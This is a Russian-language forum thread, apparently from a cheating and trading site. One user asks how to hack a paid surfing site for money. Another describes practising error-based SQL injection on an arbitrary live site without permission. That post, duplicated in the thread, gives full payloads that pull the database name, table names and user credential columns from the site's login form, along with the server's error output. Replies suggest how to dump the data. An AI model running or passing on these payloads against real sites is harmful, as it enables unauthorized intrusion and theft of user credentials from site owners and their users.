Всем привет!
Хотел бы задать пару вопросов по этому сайту seosprint net
1)Возможно взломать этот сайт?
2)Есть ли проверенные проги?(с телефона нет возможности проверить)
3)Можно ли взломать на сайт на деньги?:pf:
Добавлено через 1 минуту
Хмммм сайт не видно скину еще раз seosprint net
Последний раз редактировалось Bituaz; 20.05.2014 в 19:40.
Причина: Добавлено сообщение
1)нет
2)да,но проги просто выполняют сёрфинг
3)нет
• Правила проекта > RF-Cheats
• Обезопасьте свою сделку используя > Гарантов RF-Cheats
• По вопросам, связанным с Модераторами, обращайтесь в > Уголок Модераторов
• Перед совершением сделки, проверяйте вашего оппонента в > Списке Мошенников
• Если уверены в чьей то виновности, а доказательств мало, обратитесь в > Арбитраж
• Перед сделкой проверь человека через > Чёрный список
нет,если найдёшь в инете,то это будет троян или ещё что похуже.
• Правила проекта > RF-Cheats
• Обезопасьте свою сделку используя > Гарантов RF-Cheats
• По вопросам, связанным с Модераторами, обращайтесь в > Уголок Модераторов
• Перед совершением сделки, проверяйте вашего оппонента в > Списке Мошенников
• Если уверены в чьей то виновности, а доказательств мало, обратитесь в > Арбитраж
• Перед сделкой проверь человека через > Чёрный список
Добрый день! С недавнего времени начал изучение уязвимостей SQL. Тренируюсь на всяких платформах и т.д. Для практики выбрал первый попавшийся сайт и потихоньку по мере изучения долблю его. В общем уязвимость обнаружил лишь в форме для авторизации. К моему огорчению данные о результате выполнения запроса не выводятся на страницу. Решил получать информацию в тексте ошибки. После долгого изучения соответствующей литературы пришел к такому запросу
-1' and (select 1 from(select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2)) a from information_schema.tables group by a)b) --
Получил ответ следующего вида
Ошибка: Duplicate entry '::test123::1' for key 'group_key'
Название базы данных выяснил, поехали дальше
-1' and (select 1 from(select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2)) a from information_schema.columns group by a)b) --
Пришлось добавить параметр Limit и по одной я получил название таблиц (среди них есть необходимая "user")
Ошибка: Duplicate entry '::user::1' for key 'group_key'
... Далее тем же образом получил названия столбцов
-1' and (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='user' limit 0,1),0x3a,0x3a, floor(rand()*2)) a from information_schema.columns group by a)b) --
Имеется "id", "login" и "pass". Казалось бы... ну и всё!!!! Да фиг там я перепробовал сотню разных запросов, уже две недели не могу получить дамп. По большому счету мне нужно только чтобы база вернула мне мой же пароль. (Я зарегистрировался) Мне не нужен этот сайт, мне нужны знания. Хотя тут теперь дело принципа. Спортивный интерес, так сказать. Ребята прошу: помогите пожалуйста, наставьте на путь истинный. Я в полном отчаянии. Заранее огромнейшее спасибо и прошу прощения, если написал не в ту тему.
Добрый день! С недавнего времени начал изучение уязвимостей SQL. Тренируюсь на всяких платформах и т.д. Для практики выбрал первый попавшийся сайт и потихоньку по мере изучения долблю его. В общем уязвимость обнаружил лишь в форме для авторизации. К моему огорчению данные о результате выполнения запроса не выводятся на страницу. Решил получать информацию в тексте ошибки. После долгого изучения соответствующей литературы пришел к такому запросу
-1' and (select 1 from(select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2)) a from information_schema.tables group by a)b) --
Получил ответ следующего вида
Ошибка: Duplicate entry '::test123::1' for key 'group_key'
Название базы данных выяснил, поехали дальше
-1' and (select 1 from(select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2)) a from information_schema.columns group by a)b) --
Пришлось добавить параметр Limit и по одной я получил название таблиц (среди них есть необходимая "user")
Ошибка: Duplicate entry '::user::1' for key 'group_key'
... Далее тем же образом получил названия столбцов
-1' and (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='user' limit 0,1),0x3a,0x3a, floor(rand()*2)) a from information_schema.columns group by a)b) --
Имеется "id", "login" и "pass". Казалось бы... ну и всё!!!! Да фиг там я перепробовал сотню разных запросов, уже две недели не могу получить дамп. По большому счету мне нужно только чтобы база вернула мне мой же пароль. (Я зарегистрировался) Мне не нужен этот сайт, мне нужны знания. Хотя тут теперь дело принципа. Спортивный интерес, так сказать. Ребята прошу: помогите пожалуйста, наставьте на путь истинный. Я в полном отчаянии. Заранее огромнейшее спасибо и прошу прощения, если написал не в ту тему.
что-то я не понял
если у вас есть все данные о таблице (ид, логин, пасс), какая проблема сделать просто SELECT id,login,pass from DB?
Я не оказываю услуги гаранта!
База данных кидал: blacklist.rf-cheats.ru
Обязательно проверяйте человека через чёрный список прежде чем совершать с ним сделку.
Я благодарю Вас за ответ. Причина оказалась не в моей безграмотности (ну хотя именно в этом), а в том что таблица попросту пуста, я полагаю. Нашел данные в совсем другой таблице. С другой таблицей запросы работают. С этой- нет
Я благодарю Вас за ответ. Причина оказалась не в моей безграмотности (ну хотя именно в этом), а в том что таблица попросту пуста, я полагаю. Нашел данные в совсем другой таблице. С другой таблицей запросы работают. С этой- нет
Сделайте insert и считайте всё. Если вернет одну вашу строку, значит косяк не в запросе и таблица действительно пуста
Я не оказываю услуги гаранта!
База данных кидал: blacklist.rf-cheats.ru
Обязательно проверяйте человека через чёрный список прежде чем совершать с ним сделку.